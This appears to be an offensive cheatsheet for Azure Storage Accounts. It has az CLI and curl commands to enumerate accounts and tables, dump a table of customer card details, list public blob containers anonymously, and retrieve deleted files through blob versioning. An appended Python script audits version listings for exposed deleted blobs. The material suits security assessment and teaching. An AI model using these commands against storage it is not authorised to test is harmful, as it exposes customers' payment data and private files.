Cheatsheet - Azure - Storage Accounts
Enumerate storage accounts
List all accessible storage accounts:
az storage account list --query "[].name" -o tsv
Example output:
custdatabase
mbtwebsite
securityconfigs
Enumerate storage tables
List accessible tables within a given storage account:
az storage table list --account-name <account|e.g. custdatabase> --output table --auth-mode login
Example output:
Name
---------
customers
List contents of storage table
List the contents of a given storage table:
az storage entity query --table-name <tablename> --account-name <accountname> --output table --auth-mode login
Example output:
PartitionKey  RowKey  Card_expiry  Card_number  Customer_id                           Customer_name        Cvv
------------  ------  -----------  -----------  ------------------------------------  -------------------  ---
1             1       10/30        5**03        07244ad0-c228-43d8-a48e-1846796aa6ad  SecureBank Holdings  543
1             10      01/30        4****101     cba21bec-7e8d-4394-a145-ea7f6131a998  InnoVenture          781
1             2       09/29        40******26   66d7a744-5eb6-4b1b-9e70-a36824366534  NeuraHealth          452
Blob address breakdown
Viewing the source code of our target's website we see the following references:
<link rel="stylesheet" media="screen" href="https://mbtwebsite.blob.core.windows.net/$web/static/application-0162b80622a4b825c801f8afcd695b5918649df6f9b26eb012974f9b00a777c5.css">
<link rel="stylesheet" href="https://mbtwebsite.blob.core.windows.net/$web/static/css">
We can change the URL to the following and confirm that the website still loads:
https://mbtwebsite.blob.core.windows.net/$web/index.html
Of particular note from the URL:
mbtwebsite - the name of the Azure Storage Account associated with the blob storage.
blob.core.windows.net - the Azure Blob storage service endpoint.
$web - the container hosting the website.
Enumerate publicly accessible Blob via web browser
We can enumerate the $web container with the following in the web browser (anonymous listing only works when the container's public access level is set to Container; the Blob level allows anonymous reads of known blob names but not listing):
https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list
Directories within the container can be listed using the delimiter parameter with a value of /:
https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&delimiter=%2f
Abuse versioning in Blob to locate deleted files
Blob versioning can also be enabled, which keeps previous versions of blobs so administrators can roll files back. We can query the container to determine whether versioning is enabled and, if so, potentially access deleted sensitive files that survive as old versions.
Listing versions requires the include=versions parameter together with the x-ms-version: 2019-12-12 request header, which a browser will not send, so we use curl from the command line:
curl -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web?restype=container&comp=list&include=versions' | xmllint --format - | less
Running this we now see an old, deleted file that still exists as a version:
<Blob>
  <Name>scripts-transfer.zip</Name>
  <VersionId>2024-03-29T20:55:40.8265593Z</VersionId>
  <Properties>
    <Creation-Time>Fri, 29 Mar 2024 20:55:40 GMT</Creation-Time>
    <Last-Modified>Fri, 29 Mar 2024 20:55:40 GMT</Last-Modified>
    <Etag>0x8DC503297FC8D79</Etag>
    <Content-Length>1503</Content-Length>
    <Content-Type>application/x-zip-compressed</Content-Type>
    <Content-Encoding/>
    <Content-Language/>
    <Content-CRC64/>
    <Content-MD5>1qDsI5JcoEf80LrjeE21Yg==</Content-MD5>
    <Cache-Control/>
    <Content-Disposition/>
    <BlobType>BlockBlob</BlobType>
    <AccessTier>Hot</AccessTier>
    <AccessTierInferred>true</AccessTierInferred>
    <ServerEncrypted>true</ServerEncrypted>
  </Properties>
  <OrMetadata/>
</Blob>
We can then download this file from the command line by specifying the blob name together with its version ID:
curl -H "x-ms-version: 2019-12-12" 'https://mbtwebsite.blob.core.windows.net/$web/scripts-transfer.zip?versionId=2024-03-29T20:55:40.8265593Z' --output scripts-transfer.zip
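As an added example (not part of the original cheatsheet), the following Python audits the XML returned by the include=versions listing above and flags blobs that have no current version, i.e. objects that were deleted but remain downloadable through ?versionId=. The listing it parses is a constructed sample shaped like the response shown on this page, not captured from a real account; on a live check you would feed it the body returned by the curl command and then purge stale versions or remove public access from the container.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Constructed sample of a List Blobs response with include=versions, shaped
# like the listing above (not captured from a real account). index.html has a
# current version; scripts-transfer.zip exists only as an old version.
SAMPLE_LISTING = """<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://mbtwebsite.blob.core.windows.net/" ContainerName="$web">
  <Blobs>
    <Blob>
      <Name>index.html</Name>
      <VersionId>2024-03-29T20:50:00.0000000Z</VersionId>
      <IsCurrentVersion>true</IsCurrentVersion>
      <Properties><Content-Length>512</Content-Length></Properties>
    </Blob>
    <Blob>
      <Name>scripts-transfer.zip</Name>
      <VersionId>2024-03-29T20:55:40.8265593Z</VersionId>
      <Properties><Content-Length>1503</Content-Length></Properties>
    </Blob>
  </Blobs>
</EnumerationResults>"""


def parse_versions(xml_text):
    """Map each blob name to its [(version_id, is_current, size_bytes), ...]."""
    root = ET.fromstring(xml_text)
    versions = defaultdict(list)
    for blob in root.iter("Blob"):
        name = blob.findtext("Name")
        version_id = blob.findtext("VersionId")
        # Azure marks the live copy with IsCurrentVersion; old versions lack it.
        is_current = blob.findtext("IsCurrentVersion") == "true"
        size = int(blob.findtext("Properties/Content-Length") or 0)
        versions[name].append((version_id, is_current, size))
    return dict(versions)


def audit_versions(xml_text):
    """Return blobs with no current version: deleted, yet every listed
    version is still downloadable with ?versionId=<VersionId>."""
    findings = []
    for name, entries in parse_versions(xml_text).items():
        if not any(is_current for _, is_current, _ in entries):
            findings.append({"name": name,
                             "version_ids": [v for v, _, _ in entries]})
    return findings
```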